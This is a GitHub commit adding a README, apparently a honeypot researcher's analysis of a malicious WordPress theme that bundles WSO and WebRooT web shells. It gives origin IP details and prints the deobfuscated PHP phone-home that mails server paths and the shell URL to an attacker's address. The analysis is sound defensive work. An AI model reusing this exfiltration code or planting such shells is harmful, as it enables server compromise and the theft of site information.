Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
e3e6203
commit 581e15f
Showing
1 changed file
with
96 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,96 @@ | ||
# Kinked theme named activex | ||
|
||
A theme with a WSO 2.5 web shell, which itself has a phone-home, | ||
and a | ||
|
||
The `webrot.php` file also appears on [pastebin](https://pastebin.com/Md5U41ME), | ||
dated Dec 30, 2013. | ||
Five years floating around. | ||
|
||
## Origin | ||
|
||
### IP Address 195.142.179.223 | ||
|
||
IP address 195.142.179.223 has DNS name of host-195-142-179-223.reverse.superonline.net. | ||
|
||
host-195-142-179-223.reverse.superonline.net does not have an A record | ||
|
||
`geoiplookup` says: GeoIP Country Edition: TR, Turkey | ||
|
||
% Information related to '195.142.179.0/24AS34984' | ||
route: 195.142.179.0/24 | ||
descr: SOL-BNG | ||
origin: AS34984 | ||
mnt-by: MNT-TELLCOM | ||
mnt-routes: MNT-TELLCOM | ||
created: 2014-04-14T13:30:03Z | ||
last-modified: 2014-04-14T13:30:03Z | ||
source: RIPE | ||
|
||
MNT-TELLCOM is apparently an ISP in Istanbul. | ||
|
||
The last IP address to respond on a traceroute to 195.142.179.223 is 46.33.86.46, | ||
apparently located in Germany. | ||
|
||
### Download | ||
|
||
Downloaded to a WordPress honey pot as a theme upload. | ||
The attacker(s) sent a zip-format file, which apparently has a | ||
real WordPress theme in it, | ||
|
||
All the files have a date of Aug 1, 2013, | ||
except for `webrot.php` | ||
and `images.php` | ||
|
||
## Deofbuscation | ||
|
||
`images.php` was merely base64-encoded, only one layer of | ||
obfuscation. | ||
|
||
`webrot.php` had a more intricate obfuscation, | ||
which it shares with other malware I've caught. | ||
See [A common encoding](../common_encoding) for details. | ||
|
||
## Analysis | ||
|
||
`images.php` is a Web Shell by oRb (WSO) version 2.5, | ||
complete with a phone-home: | ||
|
||
$me=base64_decode("ZmVyaWQyM0BnbWFpbC5jb20="); | ||
$thm="Server"; | ||
$fuck="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n"; | ||
$fuck.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n"; | ||
$fuck.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n"; | ||
$fuck.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n"; | ||
$fuck.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n"; | ||
mail($me, $thm, $fuck); | ||
|
||
`$me` ends up containing the email address "ferid23@gmail.com". | ||
I see this email address associated with a 2014 [Russian account](https://notessysadmin.com/kak-ayyildiz-team-slomali-moj-blog) of | ||
Turkish hackers Ayyildiz Tim "breaking" a blog. | ||
That reconciles with the Turkish ISP or telecom for the IP address this | ||
attack came from. | ||
|
||
At least this is a new phone-home, not just a decoded "wsobuff" from WSO 2.5.1 | ||
with a different "to" address. Props to ferid23@gmail.com for that effort. | ||
|
||
`webrot.php` is slightly more interesting. | ||
|
||
It phones home to mymktmymkt@gmail.com and tokmaktokmak1@gmail.com | ||
with the same information that `images.php` sends to ol' ferid23@gmail.com | ||
tokmaktokmak1@gmail.com appears on a [pastebin](https://pastebin.com/Md5U41ME), | ||
on a [Turkish security site](https://www.turkhackteam.org/web-server-guvenligi/1140416-webr00t-shell-decode.html) | ||
and a few others. | ||
|
||
`webrot.php` contains a number of base64-encoded pieces of source: | ||
|
||
* Perl file `web.root` - a Perl web shell? | ||
* PHP file `cmd.php` | ||
* PHP file `litebypass.php` | ||
* PHP file `mass.php` | ||
* PHP file `wpindex.php` - Frenchish variable names? | ||
|
||
Lots of "coded by WebRooT" comments throughout, | ||
but very uneven coding style and naming conventions. | ||
Some output is Turkish, some is English. | ||
Looks like "WebRooT" put this package together from pre-existing code. |